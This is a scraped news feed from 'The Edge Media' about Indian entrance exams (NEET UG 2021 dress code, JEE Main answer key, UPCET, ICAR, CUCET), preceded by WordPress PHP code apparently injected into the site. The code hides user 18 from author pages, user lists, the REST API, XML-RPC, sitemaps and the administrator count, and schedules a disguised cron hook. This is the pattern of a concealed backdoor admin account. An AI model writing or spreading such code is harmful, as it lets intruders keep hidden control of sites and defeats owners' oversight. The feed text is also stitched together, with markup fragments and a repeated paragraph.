add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post NTA specifies dress code for NEET UG 2021students appeared first on The Edge Media.
]]>NTA has put a restriction on wearing any type of ornaments like earrings, chains, bracelets, pendants, and other metallic items to the exam hall. Carrying accessories like wallets, goggles, caps and others are also restricted.
NTA has already instructed that there is no provision of any baggage counter at the exam venue so any extra items that a student brings cannot be stored neither can be allowed to carry to the exam hall.
Students will not be allowed to wear light-colored clothes with long sleeves. However, in case of any cultural or customary clothes that candidates wear to the exam center, they are supposed to report at 12:30 pm so that they can be properly frisked without disturbing other students.
Students will not be allowed to wear shoes to the exam center. So they must wear slippers or sandals. NTA has also allowed students to wear sandals with low heels.
NEET UG 2021 is scheduled on September 12. Students appearing for the examination will undergo security checking at the main gate of NEET exam center through hand held metal detectors, temperature check, and other safety protocols to which students will have to cooperate completely.
NEET UG 2021 is scheduled on September 12. Students appearing for the examination will undergo security checking at the main gate of NEET exam center through hand held metal detectors, temperature check, and other safety protocols to which students will have to cooperate completely.
NEET UG exam will be conducted from 2 pm to 5 pm and students will be required to report at least an hour prior to the examination at the center.
The post NTA specifies dress code for NEET UG 2021students appeared first on The Edge Media.
]]>The post NTA will soon release the provisional answer key of the last session of JEE Main 2021 appeared first on The Edge Media.
]]>“Only paid challenges made during stipulated time through key challenge link will be considered,” NTA has said adding that the challenges without justification or evidence will not be considered.
The NTA’s decision on the challenges shall be final and no further communication will be entertained,” the Agency has said.
Candidates must note that the NTA will not inform the candidates individually about their challenges. The subject experts will examine all the challenges received and then a final answer key will be displayed and declared.
The JEE Main 2021 result will be compiled on the basis of the final answer key released at jeemain.nta.nic.in.
The NTA will also display the recorded responses and question paper attempted by the candidates at jeemain.nta.nic.in prior to the declaration of JEE Main 2021 result.
JEE Main 2021 Result: Important Points
Candidates’ All India Rank (AIR) will be compiled and declared in this session.
No scorecard will be sent to the candidates individually at their address. Candidates must download their scorecard from the JEE Main website: nta.ac.in or jeemain.nta.nic.in only.
There is no provision for re-valuation or re-checking of the JEE Main 2021 result. No correspondence in this regard will be entertained, the NTA has clarified.
Only the All India Rank (AIR) will be used for admissions through Central Seat Allocation Board (CSAB) or Joint Seat Allocation Authority (JoSAA) to NITs, IIITs, CFTIs, SFIs and others.
All participating institutions that do not use the Centralized Seat Allocation Process will prepare their own ranking based on the performance in JEE Main 2021 and other criteria as decided by them.
The post NTA will soon release the provisional answer key of the last session of JEE Main 2021 appeared first on The Edge Media.
]]>The post NTA releases UPCET 2021 admit cards appeared first on The Edge Media.
]]>Students will be required to fill in their application form number and date of birth to check the admit card on the website. The UPCET 2021 exam will be conducted by the NTA on September 5 and 6. The exam will be held as a Computer Based Test (CBT).
UPCET 2021 Admit Card: How To Download
– Go to the official website of UPCET- upcet.nta.nic.in.
– On the displayed homepage, click on the required link: ‘Download Admit Card for UPCET UG, 2021’ or ‘Download Admit Card for UPCET PG, 2021’ link.
– Candidate will now be redirected to a new login page.
– Fill in the asked credentials: Application number, Date of Birth, and Security Pin
– Click on ‘Submit’
– UPCET 2021 admit card will be displayed on screen.
– Save and take a print out of the admit card for future reference
UPCET 2021 admit cards are available to download only through online mode and the NTA will not send the hard copies of the admit card through post.
Candidates can refer to the “Information bulletin”, hosted on the official website of UPCET, to get detailed information on eligibility criteria, scheme of the exam, medium of the examination, exam centers and other important aspects of the UPCET 2021 exam.
The official notice released by the NTA states: “Candidates are advised to check thoroughly the course/s applied, paper/s in which they are required to appear, details of the exam centre and the date and shift/s of the exam in which they are required to appear carefully.”
The post NTA releases UPCET 2021 admit cards appeared first on The Edge Media.
]]>The post NTA extends the application deadline for ICAR appeared first on The Edge Media.
]]>“Pursuant to representations from candidates to extend the last date for submission of online forms and to ensure larger participation of candidates in the exams, it has been decided to reschedule the exam activities in respect of ICAR Entrance examinations,” read an NTA statement.
While the correction window will be opened between August 24 and August 25 for AIEEA UG, the correction window for editing the filled in application forms will remain open from August 28 to August 31 for AIEEA PG students.
The date of issue of AIEEA admit cards have also been announced. The admit cards will be made available for download from September 1 and September 7 for the AIEEA UG and AIEEA PG applicants respectively.
ICAR AIEEA qualified students will be eligible for admissions to 75 agricultural universities across the country including 64 state agricultural, veterinary, horticultural and fisheries universities, four ICAR deemed universities, three central agricultural universities and four central universities having faculty of agriculture.
The post NTA extends the application deadline for ICAR appeared first on The Edge Media.
]]>The post CUCET 2021 : Application window opens, check the details below appeared first on The Edge Media.
]]>CUCET will be held for admission to 12 participating Central Universities across India. These universities are — Assam University, Silchar; Central University of Andhra Pradesh; Central University of Gujarat; Central University of Haryana; Central University of Jammu; Central University of Jharkhand; Central University of Karnataka; Central University of Kerala; Central University of Punjab; Central University of Rajasthan; Central University of South Bihar and Central University of Tamil Nadu.
Students seeking admission to undergraduate or integrated and postgraduate programs in the central universities can check the eligibility criteria required by a particular participating university for a desired programme.
Steps To Apply For CUCET 2021:
– Apply for Online Registration
– Fill Online Application Form
– Upload scanned photo and signature
– Pay examination fee
“Admissions are handled at the level of each of the participating Central Universities (CUs) for their respective programs,” read a statement on the NTA website.
After the declaration of the CU-CET 2021 result by NTA, the respective CUs will declare the counselling/ admission schedule and merit list based on the weightage on the CU-CET 2021 score and the other criteria of the respective CU. There will be online/offline admission counselling for participating CUs,” it added.
The post CUCET 2021 : Application window opens, check the details below appeared first on The Edge Media.
]]>The post NTA extends the last date to submit the application fee of NEET 2021 appeared first on The Edge Media.
]]>“In view of the persistent demand from the student community and in their support, the National Testing Agency (NTA) has decided to provide another opportunity only for the registered candidates who could not pay the examination fee during the period of the Online Application Form for National Eligibility Entrance Cum Test NEET (UG) – 2021,” the NTA said.
Candidates who had submitted NEET 2021 application form can pay the exam fee through credit or debit card, netbanking, UPI and PAYTM, it said.
“The concerned candidates are requested to use this final opportunity as no further chance will be provided,” it added.
The NEET 2021 application form correction window ended today at 2 pm. Once the fee payment facility ends, the NTA will release NEET 2021 admit cards.
This year, NEET 2021 will be used for admission to BSc Nursing and BSc life sciences courses, apart from MBBS, BDS, Veterinary and AYUSH courses.
NTA will declare the NEET 2021 result and the all India merit list after which the Medical Counselling Committee (MCC), the AYUSH counselling committee and state bodies will conduct counselling for All India Quota (AIQ) and state quota seats.
The post NTA extends the last date to submit the application fee of NEET 2021 appeared first on The Edge Media.
]]>